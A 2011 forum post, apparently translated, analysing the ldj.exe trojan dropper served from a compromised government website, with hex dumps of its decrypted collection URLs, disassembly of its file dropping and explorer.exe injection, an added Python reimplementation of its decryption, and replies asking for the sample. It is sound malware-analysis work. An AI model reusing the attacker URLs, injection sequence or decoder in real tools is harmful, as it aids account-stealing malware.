[Original] Analysis of ldj.exe! With part of the dedicated removal-tool code attached
Posted: 2011-8-10 17:05


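The NDRC (National Development and Reform Commission) website was compromised to serve a trojan; Fangfang found it, and I analyzed it.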


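Analysis of the dropper file ldj.exe: (after the dropper finished loading the ocx files the code became garbled; I don't know whether there is another trojan on my machine or whether it is a problem after loading)
Main behaviors:
1. Generates dbr99008.ocx and dbr31004.ocx
2. Copies rundll.exe to C:\WINDOWS\SYSTEM32\gbvgbv31.exe and runs it, loading the files above and injecting into explorer.exe
3. Interacts via WinSta0\Default
4. Decrypts 4 collection URLs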

00401100 68 74 74 70 3A 2F 2F 67 http://g
00401110 75 63 63 69 2E 74 6C 79 73 6A 2E 63 6F 6D 3A 39 ucci.tlysj.com:9
00401120 39 36 32 2F 66 72 62 2F 72 62 2E 61 73 70 962/frb/rb.asp

00401180 68 74 74 70 3A 2F 2F 67 http://g
00401190 75 63 63 69 2E 74 6C 79 73 6A 2E 63 6F 6D 3A 39 ucci.tlysj.com:9
004011A0 39 36 32 2F 66 74 2E 61 73 70 962/ft.asp

00401208 68 74 74 70 3A 2F 2F 67 75 63 63 69 2E 74 6C 79 http://gucci.tly
00401218 73 6A 2E 63 6F 6D 3A 39 39 36 32 2F 46 6F 6E 65 sj.com:9962/Fone
00401228 39 2F 6A 75 73 74 2E 61 73 70 9/just.asp

00401288 68 74 74 70 3A 2F 2F 76 35 2E 37 31 77 61 70 2E http://v5.71wap.
00401298 63 6F 6D 3A 39 39 36 32 2F 46 6F 6E 65 39 2F 6A com:9962/Fone9/j
004012A8 75 73 74 2E 61 73 70 ust.asp
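In addition, it generates a ttf font file. I did not find any use for it; it is probably an intermediate step, but I never found this file in the fonts folder!!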

The dropper is packed with UPX. After reaching the OEP, I won't paste the code for the simpler functions.

00401EB9    55              push    ebp
00401EBA    8BEC            mov     ebp, esp
00401EBC    81EC 580A0000   sub     esp, 0A58
00401EC2    53              push    ebx
00401EC3    56              push    esi
00401EC4    57              push    edi
00401EC5    6A 40           push    40
00401EC7    33DB            xor     ebx, ebx
00401EC9    59              pop     ecx
00401ECA    33C0            xor     eax, eax
00401ECC    8DBD C9FDFFFF   lea     edi, dword ptr [ebp-237]
00401ED2    889D C8FDFFFF   mov     byte ptr [ebp-238], bl
00401ED8    8B35 A8104000   mov     esi, dword ptr [4010A8]          ; MSVCRT.sprintf
00401EDE    F3:AB           rep     stos dword ptr es:[edi]
00401EE0    66:AB           stos    word ptr es:[edi]
00401EE2    AA              stos    byte ptr es:[edi]
00401EE3    68 FC154000     push    004015FC                         ; ASCII "008"
00401EE8    8D85 C8FDFFFF   lea     eax, dword ptr [ebp-238]
00401EEE    68 F0154000     push    004015F0                         ; ASCII "dbr99%s.ocx"
00401EF3    50              push    eax
00401EF4    C645 FC 54      mov     byte ptr [ebp-4], 54             ; TLS
00401EF8    C645 FD 4C      mov     byte ptr [ebp-3], 4C
00401EFC    C645 FE 53      mov     byte ptr [ebp-2], 53
00401F00    885D FF         mov     byte ptr [ebp-1], bl
00401F03    FFD6            call    esi
00401F05    83C4 0C         add     esp, 0C
00401F08    33C0            xor     eax, eax
00401F0A    8DBD C5FCFFFF   lea     edi, dword ptr [ebp-33B]
00401F10    889D C4FCFFFF   mov     byte ptr [ebp-33C], bl
00401F16    6A 40           push    40
00401F18    889D C0FBFFFF   mov     byte ptr [ebp-440], bl
00401F1E    59              pop     ecx
00401F1F    C685 CCFEFFFF 7>mov     byte ptr [ebp-134], 72
00401F26    F3:AB           rep     stos dword ptr es:[edi]
00401F28    66:AB           stos    word ptr es:[edi]
00401F2A    AA              stos    byte ptr es:[edi]
00401F2B    6A 40           push    40
00401F2D    33C0            xor     eax, eax
00401F2F    59              pop     ecx
00401F30    8DBD C1FBFFFF   lea     edi, dword ptr [ebp-43F]
00401F36    F3:AB           rep     stos dword ptr es:[edi]
00401F38    66:AB           stos    word ptr es:[edi]
00401F3A    AA              stos    byte ptr es:[edi]
00401F3B    6A 3D           push    3D
00401F3D    33C0            xor     eax, eax
00401F3F    59              pop     ecx
00401F40    8DBD D9FEFFFF   lea     edi, dword ptr [ebp-127]
00401F46    C685 CDFEFFFF 7>mov     byte ptr [ebp-133], 75           ; rundll32.exe
00401F4D    C685 CEFEFFFF 6>mov     byte ptr [ebp-132], 6E
00401F54    C685 CFFEFFFF 6>mov     byte ptr [ebp-131], 64
00401F5B    C685 D0FEFFFF 6>mov     byte ptr [ebp-130], 6C
00401F62    C685 D1FEFFFF 6>mov     byte ptr [ebp-12F], 6C
00401F69    C685 D2FEFFFF 3>mov     byte ptr [ebp-12E], 33
00401F70    C685 D3FEFFFF 3>mov     byte ptr [ebp-12D], 32
00401F77    C685 D4FEFFFF 2>mov     byte ptr [ebp-12C], 2E
00401F7E    C685 D5FEFFFF 6>mov     byte ptr [ebp-12B], 65
00401F85    C685 D6FEFFFF 7>mov     byte ptr [ebp-12A], 78
00401F8C    C685 D7FEFFFF 6>mov     byte ptr [ebp-129], 65
00401F93    889D D8FEFFFF   mov     byte ptr [ebp-128], bl
00401F99    F3:AB           rep     stos dword ptr es:[edi]
00401F9B    66:AB           stos    word ptr es:[edi]
00401F9D    AA              stos    byte ptr es:[edi]
00401F9E    6A 40           push    40
00401FA0    33C0            xor     eax, eax
00401FA2    59              pop     ecx
00401FA3    8DBD B9F9FFFF   lea     edi, dword ptr [ebp-647]
00401FA9    889D B8F9FFFF   mov     byte ptr [ebp-648], bl
00401FAF    F3:AB           rep     stos dword ptr es:[edi]
00401FB1    66:AB           stos    word ptr es:[edi]
00401FB3    AA              stos    byte ptr es:[edi]
00401FB4    E8 02F9FFFF     call    004018BB                         ; privilege escalation
00401FB9    BF 04010000     mov     edi, 104
00401FBE    8D85 B0F7FFFF   lea     eax, dword ptr [ebp-850]
00401FC4    57              push    edi
00401FC5    50              push    eax
00401FC6    53              push    ebx
00401FC7    FF15 50104000   call    dword ptr [401050]               ; kernel32.GetModuleFileNameA
00401FCD    8D45 D0         lea     eax, dword ptr [ebp-30]
00401FD0    68 E4154000     push    004015E4                         ; build the path for the generated dbr31004.ocx
00401FD5    50              push    eax
00401FD6    FFD6            call    esi
00401FD8    8D45 D0         lea     eax, dword ptr [ebp-30]
00401FDB    50              push    eax
00401FDC    8D85 BCFAFFFF   lea     eax, dword ptr [ebp-544]
00401FE2    50              push    eax
00401FE3    E8 A8020000     call    00402290                         ; jmp to MSVCRT.strcpy
00401FE8    8D85 BCFAFFFF   lea     eax, dword ptr [ebp-544]
00401FEE    68 DC154000     push    004015DC                         ; ASCII ".ocx"
00401FF3    50              push    eax
00401FF4    E8 91020000     call    0040228A                         ; jmp to MSVCRT.strcat
00401FF9    8D85 BCFAFFFF   lea     eax, dword ptr [ebp-544]
00401FFF    50              push    eax
00402000    8D85 BCFAFFFF   lea     eax, dword ptr [ebp-544]
00402006    50              push    eax
00402007    E8 BEFAFFFF     call    00401ACA                         ; get the path C:\WINDOWS\SYSTEM32\dbr31004.ocx
0040200C    8D85 B0F7FFFF   lea     eax, dword ptr [ebp-850]
00402012    50              push    eax
00402013    E8 8AFBFFFF     call    00401BA2                         ; open the file, read the data and decrypt the URLs; what is read here is the encrypted URLs, and the decryption is implemented inside

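Now let's look at the decryption function. It is fairly simple: it takes the length of the string "LUDJ", uses that as the inner loop condition, reads 118h bytes of data, and applies a simple ror operation.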

00401B3C    55              push    ebp
00401B3D    8BEC            mov     ebp, esp
00401B3F    53              push    ebx
00401B40    56              push    esi
00401B41    57              push    edi
00401B42    8B75 08         mov     esi, dword ptr [ebp+8]
00401B45    8B7D 10         mov     edi, dword ptr [ebp+10]
00401B48    8B5D 0C         mov     ebx, dword ptr [ebp+C]
00401B4B    8B55 14         mov     edx, dword ptr [ebp+14]
00401B4E    85DB            test    ebx, ebx
00401B50    74 18           je      short 00401B6A
00401B52    8A06            mov     al, byte ptr [esi]
00401B54    8A0F            mov     cl, byte ptr [edi]
00401B56    D2C8            ror     al, cl
00401B58    8806            mov     byte ptr [esi], al
00401B5A    46              inc     esi
00401B5B    47              inc     edi
00401B5C    4B              dec     ebx
00401B5D    4A              dec     edx
00401B5E    85D2            test    edx, edx
00401B60  ^ 75 EC           jnz     short 00401B4E
00401B62    8B55 14         mov     edx, dword ptr [ebp+14]
00401B65    8B7D 10         mov     edi, dword ptr [ebp+10]
00401B68  ^ EB E4           jmp     short 00401B4E
00401B6A    5F              pop     edi
00401B6B    5E              pop     esi
00401B6C    5B              pop     ebx
00401B6D    5D              pop     ebp
00401B6E    C3              retn

00402018    83C4 24         add     esp, 24
0040201B    8D85 B4F8FFFF   lea     eax, dword ptr [ebp-74C]
00402021    C645 F4 5C      mov     byte ptr [ebp-C], 5C             ; build the fonts\dbr31004.ttf path
00402025    C645 F5 66      mov     byte ptr [ebp-B], 66
00402029    57              push    edi
0040202A    50              push    eax
0040202B    C645 F6 6F      mov     byte ptr [ebp-A], 6F
0040202F    C645 F7 6E      mov     byte ptr [ebp-9], 6E
00402033    C645 F8 74      mov     byte ptr [ebp-8], 74
00402037    C645 F9 73      mov     byte ptr [ebp-7], 73
0040203B    C645 FA 5C      mov     byte ptr [ebp-6], 5C
0040203F    885D FB         mov     byte ptr [ebp-5], bl
00402042    FF15 4C104000   call    dword ptr [40104C]               ; kernel32.GetWindowsDirectoryA
00402048    8D45 F4         lea     eax, dword ptr [ebp-C]
0040204B    50              push    eax
0040204C    8D85 B4F8FFFF   lea     eax, dword ptr [ebp-74C]
00402052    50              push    eax
00402053    E8 32020000     call    0040228A                         ; jmp to MSVCRT.strcat
00402058    8D45 D0         lea     eax, dword ptr [ebp-30]
0040205B    50              push    eax
0040205C    8D85 B4F8FFFF   lea     eax, dword ptr [ebp-74C]
00402062    50              push    eax
00402063    E8 22020000     call    0040228A                         ; jmp to MSVCRT.strcat
00402068    8D85 B4F8FFFF   lea     eax, dword ptr [ebp-74C]
0040206E    68 D4154000     push    004015D4                         ; ASCII ".ttf"
00402073    50              push    eax
00402074    E8 11020000     call    0040228A                         ; jmp to MSVCRT.strcat
00402079    8D85 B4F8FFFF   lea     eax, dword ptr [ebp-74C]
0040207F    50              push    eax
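00402080    E8 06FEFFFF     call    00401E8B                         ; creates the file, but no file was found in the corresponding directory
00402085    8B3D 70104000   mov     edi, dword ptr [401070]          ; kernel32.GetTickCount, gets the total time since system boot; about to generate randomly named files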
0040208B    83C4 1C         add     esp, 1C
0040208E    FFD7            call    edi
00402090    50              push    eax
00402091    8D85 C4FCFFFF   lea     eax, dword ptr [ebp-33C]
00402097    68 C4154000     push    004015C4                         ; ASCII "%08Xmdd.temp"
0040209C    50              push    eax
0040209D    FFD6            call    esi
0040209F    8D85 C4FCFFFF   lea     eax, dword ptr [ebp-33C]
004020A5    50              push    eax
004020A6    8D85 C4FCFFFF   lea     eax, dword ptr [ebp-33C]
004020AC    50              push    eax
004020AD    E8 DAF9FFFF     call    00401A8C                         ; these temp files are placed under the tmp path
004020B2    8D85 C4FCFFFF   lea     eax, dword ptr [ebp-33C]
004020B8    50              push    eax
004020B9    8D45 FC         lea     eax, dword ptr [ebp-4]
004020BC    6A 66           push    66
004020BE    50              push    eax                               ;TLS
004020BF    53              push    ebx
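004020C0    E8 61F8FFFF     call    00401926                         ; drops the file via FindResource, size 9E00; the PE header address obtained is 00404090
This function generates the dbr31004.ocx file: using the temp file obtained just above, it first writes 9E00 bytes of data into it, from address 00404090.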
004020C5    83C4 24         add     esp, 24
004020C8    8D85 BCFAFFFF   lea     eax, dword ptr [ebp-544]
004020CE    6A 03           push    3
004020D0    50              push    eax                              
004020D1    8D85 C4FCFFFF   lea     eax, dword ptr [ebp-33C]
004020D7    50              push    eax
004020D8    FF15 54104000   call    dword ptr [401054]               ; kernel32.MoveFileExA, moves the temp file just generated into the system32 folder and deletes the temp file
004020DE    8D85 C4FCFFFF   lea     eax, dword ptr [ebp-33C]
004020E4    50              push    eax
004020E5    FF15 58104000   call    dword ptr [401058]               ; kernel32.DeleteFileA
004020EB    FFD7            call    edi
004020ED    50              push    eax
004020EE    8D85 C0FBFFFF   lea     eax, dword ptr [ebp-440]
004020F4    68 B4154000     push    004015B4                         ; ASCII "%08Xeime.temp"; same as above, not repeated: this generates dbr99008.ocx in system32, and the temp files created in the tmp folder are all deleted
004020F9    50              push    eax
004020FA    FFD6            call    esi
004020FC    8D85 C0FBFFFF   lea     eax, dword ptr [ebp-440]
00402102    50              push    eax
00402103    8D85 C0FBFFFF   lea     eax, dword ptr [ebp-440]
00402109    50              push    eax
0040210A    E8 7DF9FFFF     call    00401A8C
0040210F    8D85 C0FBFFFF   lea     eax, dword ptr [ebp-440]
00402115    50              push    eax
00402116    8D45 FC         lea     eax, dword ptr [ebp-4]
00402119    6A 67           push    67
0040211B    50              push    eax
0040211C    53              push    ebx
0040211D    E8 04F8FFFF     call    00401926
00402122    8D85 C8FDFFFF   lea     eax, dword ptr [ebp-238]
00402128    50              push    eax
00402129    8D85 C8FDFFFF   lea     eax, dword ptr [ebp-238]
0040212F    50              push    eax
00402130    E8 95F9FFFF     call    00401ACA                         ; gets the system32 path, not described in detail again
00402135    83C4 2C         add     esp, 2C
00402138    8D85 C8FDFFFF   lea     eax, dword ptr [ebp-238]
0040213E    6A 03           push    3
00402140    50              push    eax
00402141    8D85 C0FBFFFF   lea     eax, dword ptr [ebp-440]
00402147    50              push    eax
00402148    FF15 54104000   call    dword ptr [401054]               ; kernel32.MoveFileExA
0040214E    8D85 C0FBFFFF   lea     eax, dword ptr [ebp-440]
00402154    50              push    eax
00402155    FF15 58104000   call    dword ptr [401058]               ; kernel32.DeleteFileA
0040215B    8D85 CCFEFFFF   lea     eax, dword ptr [ebp-134]
00402161    50              push    eax
00402162    8D85 CCFEFFFF   lea     eax, dword ptr [ebp-134]
00402168    50              push    eax
00402169    E8 5CF9FFFF     call    00401ACA
0040216E    8D85 B8F9FFFF   lea     eax, dword ptr [ebp-648]   
00402174    50              push    eax                     
00402175    68 A4154000     push    004015A4                         ; ASCII "gbvgbv31.exe"
0040217A    E8 4BF9FFFF     call    00401ACA                         ; this gbvgbv.exe is actually rundll32.exe, created by copying within the system32 folder
0040217F    83C4 10         add     esp, 10
00402182    8D85 B8F9FFFF   lea     eax, dword ptr [ebp-648]
00402188    53              push    ebx
00402189    50              push    eax
0040218A    8D85 CCFEFFFF   lea     eax, dword ptr [ebp-134]
00402190    50              push    eax
00402191    FF15 6C104000   call    dword ptr [40106C]               ; kernel32.CopyFileA
00402197    8D85 C8FDFFFF   lea     eax, dword ptr [ebp-238]
0040219D    C645 E4 65      mov     byte ptr [ebp-1C], 65            ;explorer.exe
004021A1    50              push    eax
004021A2    8D45 E4         lea     eax, dword ptr [ebp-1C]
004021A5    50              push    eax
004021A6    C645 E5 78      mov     byte ptr [ebp-1B], 78    
004021AA    C645 E6 70      mov     byte ptr [ebp-1A], 70
004021AE    C645 E7 6C      mov     byte ptr [ebp-19], 6C
004021B2    C645 E8 6F      mov     byte ptr [ebp-18], 6F
004021B6    C645 E9 72      mov     byte ptr [ebp-17], 72
004021BA    C645 EA 65      mov     byte ptr [ebp-16], 65
004021BE    C645 EB 72      mov     byte ptr [ebp-15], 72
004021C2    C645 EC 2E      mov     byte ptr [ebp-14], 2E
004021C6    C645 ED 65      mov     byte ptr [ebp-13], 65
004021CA    C645 EE 78      mov     byte ptr [ebp-12], 78
004021CE    C645 EF 65      mov     byte ptr [ebp-11], 65
004021D2    885D F0         mov     byte ptr [ebp-10], bl
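004021D5    E8 1BF5FFFF     call    004016F5                         ; this function creates a process snapshot, gets the addresses of those three functions and looks up the explorer.exe process; this is where the thread is about to be injected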

Let's see what it does after finding the process. This is function one:

00401600    55              push    ebp
00401601    8BEC            mov     ebp, esp
00401603    81EC 08020000   sub     esp, 208
00401609    53              push    ebx
0040160A    56              push    esi
0040160B    57              push    edi
0040160C    6A 40           push    40
0040160E    33DB            xor     ebx, ebx
00401610    59              pop     ecx
00401611    33C0            xor     eax, eax
00401613    8DBD F9FDFFFF   lea     edi, dword ptr [ebp-207]
00401619    889D F8FDFFFF   mov     byte ptr [ebp-208], bl
0040161F    6A 40           push    40
00401621    F3:AB           rep     stos dword ptr es:[edi]
00401623    66:AB           stos    word ptr es:[edi]
00401625    AA              stos    byte ptr es:[edi]
00401626    59              pop     ecx
00401627    33C0            xor     eax, eax
00401629    8DBD FDFEFFFF   lea     edi, dword ptr [ebp-103]
0040162F    889D FCFEFFFF   mov     byte ptr [ebp-104], bl
00401635    F3:AB           rep     stos dword ptr es:[edi]
00401637    66:AB           stos    word ptr es:[edi]
00401639    AA              stos    byte ptr es:[edi]
0040163A    E8 7C020000     call    004018BB                         ; this function was mentioned above: privilege escalation
0040163F    FF75 08         push    dword ptr [ebp+8]
00401642    53              push    ebx
00401643    68 10040000     push    410
00401648    FF15 84104000   call    dword ptr [401084]               ; kernel32.OpenProcess, opens the explorer.exe process
0040164E    8BF8            mov     edi, eax
00401650    3BFB            cmp     edi, ebx
00401652    0F84 8F000000   je      004016E7
00401658    8D85 F8FDFFFF   lea     eax, dword ptr [ebp-208]
0040165E    68 04010000     push    104
00401663    50              push    eax
00401664    53              push    ebx
00401665    57              push    edi
00401666    E8 850C0000     call    004022F0                         ; jmp to PSAPI.GetModuleFileNameExA, gets the file path C:\WINDOWS\Explorer.EXE
0040166B    8D85 F8FDFFFF   lea     eax, dword ptr [ebp-208]
00401671    50              push    eax
00401672    E8 1F0C0000     call    00402296                         ; jmp to MSVCRT.strlen
00401677    8D85 F8FDFFFF   lea     eax, dword ptr [ebp-208]
0040167D    50              push    eax
0040167E    8D85 FCFEFFFF   lea     eax, dword ptr [ebp-104]
00401684    50              push    eax
00401685    E8 060C0000     call    00402290                         ; jmp to MSVCRT.strcpy
0040168A    8B35 94104000   mov     esi, dword ptr [401094]          ; MSVCRT.strrchr
00401690    8D85 FCFEFFFF   lea     eax, dword ptr [ebp-104]
00401696    6A 5C           push    5C
00401698    50              push    eax
00401699    FFD6            call    esi                              ; position where explorer.exe first appears: 0012F2CA
0040169B    83C4 14         add     esp, 14
0040169E    3BC3            cmp     eax, ebx
004016A0    74 39           je      short 004016DB
004016A2    8818            mov     byte ptr [eax], bl
004016A4    8D85 FCFEFFFF   lea     eax, dword ptr [ebp-104]
004016AA    6A 5C           push    5C
004016AC    50              push    eax
004016AD    FFD6            call    esi
004016AF    59              pop     ecx
004016B0    3BC3            cmp     eax, ebx
004016B2    59              pop     ecx
004016B3    74 26           je      short 004016DB
004016B5    8818            mov     byte ptr [eax], bl
004016B7    8D85 FCFEFFFF   lea     eax, dword ptr [ebp-104]
004016BD    68 38154000     push    00401538                         ; ASCII "\data\elements.data"
004016C2    50              push    eax
004016C3    E8 C20B0000     call    0040228A                         ; jmp to MSVCRT.strcat, yields the path C:\data\elements.data
004016C8    8D85 FCFEFFFF   lea     eax, dword ptr [ebp-104]
004016CE    50              push    eax
004016CF    E8 D5020000     call    004019A9                         ; FindFirstFile, the file was not found
004016D4    83C4 0C         add     esp, 0C
004016D7    85C0            test    eax, eax
004016D9    74 13           je      short 004016EE
004016DB    57              push    edi
004016DC    FF15 88104000   call    dword ptr [401088]               ; kernel32.CloseHandle
004016E2    6A 01           push    1
004016E4    58              pop     eax
004016E5    EB 09           jmp     short 004016F0
004016E7    53              push    ebx
004016E8    FF15 88104000   call    dword ptr [401088]               ; kernel32.CloseHandle
004016EE    33C0            xor     eax, eax
004016F0    5F              pop     edi
004016F1    5E              pop     esi
004016F2    5B              pop     ebx
004016F3    C9              leave
004016F4    C3              retn
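
The decryption loop at 00401B3C, rewritten in Python as an added example that is not part of the original post: each data byte is rotated right by the matching byte of the repeating key "LUDJ". The argument order (data, length, key, key length) is read from the listing; the URL, the encoded block and the `encode`/`extract_urls` helpers are constructed for illustration.

```python
import re

KEY = b"LUDJ"        # key string named in the post
BLOB_SIZE = 0x118    # size of the encrypted block named in the post

# Assumption: decoded URLs are plain printable-ASCII runs inside the block.
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def ror8(value, count):
    """Rotate a byte right; mirrors x86 `ror al, cl` on an 8-bit operand."""
    count &= 7  # for an 8-bit operand only the count modulo 8 has an effect
    return ((value >> count) | (value << (8 - count))) & 0xFF


def rol8(value, count):
    """Inverse of ror8; used here only to build the constructed sample."""
    count &= 7
    return ((value << count) | (value >> (8 - count))) & 0xFF


def decode(blob, key=KEY):
    """Walk data and key together, restarting the key when it is used up."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(ror8(b, key[i % len(key)]) for i, b in enumerate(blob))


def encode(plain, key=KEY):
    """Hypothetical helper: produce a block that decode() turns back into plain."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(rol8(b, key[i % len(key)]) for i, b in enumerate(plain))


def extract_urls(decoded):
    """Pull URL-looking strings out of a decoded block for review or blocking."""
    return [m.group().decode("ascii") for m in URL_RE.finditer(decoded)]


# Constructed sample: one placeholder URL, NUL-padded to the block size.
SAMPLE_URL = b"http://collector.example.invalid:9962/a.asp"
SAMPLE_BLOB = encode(SAMPLE_URL.ljust(BLOB_SIZE, b"\x00"))

if __name__ == "__main__":
    for url in extract_urls(decode(SAMPLE_BLOB)):
        print(url)
```

With this key the effective rotation counts are 4, 5, 4 and 2 bits, and NUL padding stays NUL because rotating zero yields zero.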

Latest replies (11)

2
Congratulations, NDRC, heh. Bumping.
2011-8-10 17:11

3
Damn, it's the NDRC's, well of course.
2011-8-10 17:45

4
Requesting the sample!!!!!
2011-8-10 17:51

5
Requesting the sample, expert; please send it to lganchao@gmail.com
2011-8-18 14:14

6
Requesting the sample... xiii0928@126.com
2011-8-18 14:41

7
Leaving my name and bookmarking!!
2011-8-18 14:43

8
This is the account-stealing trojan bundled with Warcraft BigFoot (魔兽大脚)!
2011-8-18 22:56

9
I've run into a similar virus; it includes keyboard-hooking behavior to steal accounts.
2011-8-19 09:20

10
This kind of input-method account-stealing trojan has been around for a long time, ha, very sleazy.
2011-8-21 10:50

11
I'd still like to request the sample..
2011-9-7 10:26

12
The NDRC website was compromised to serve a trojan; Fangfang found it, and I analyzed it.

Fangfang......?? "Digits" (数字)??
2011-9-7 15:57